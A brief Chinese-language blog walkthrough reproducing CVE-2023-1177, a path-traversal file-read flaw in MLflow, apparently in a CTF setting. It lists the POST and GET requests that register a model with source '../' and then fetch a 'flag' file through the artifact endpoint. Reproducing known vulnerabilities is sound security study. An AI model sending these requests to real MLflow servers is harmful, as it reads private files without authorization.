ARTICLE DETAIL

建站实战干货

来自一线的建站与推广经验沉淀,每一条都经过真实交付验证。

CVE-2023-1177

2026/8/11 4:46:14 拓冰建站 浏览量
CVE-2023-1177

CVE-2023-1177复现
image

进入网站
image

使用bp抓包,构造poc

POST /ajax-api/2.0/mlflow/registered-models/create
Content-Type: application/json{"name": "testfile"}

image

构造要查看的文件的poc

POST /ajax-api/2.0/mlflow/model-versions/create
Content-Type: application/json{"name": "testfile", "source": "../"}

image

查看flag/model-versions/get-artifact?path=flag&name=testfile&version=1
其中path就是你要查看的文件,name就是你构造的文件路径
image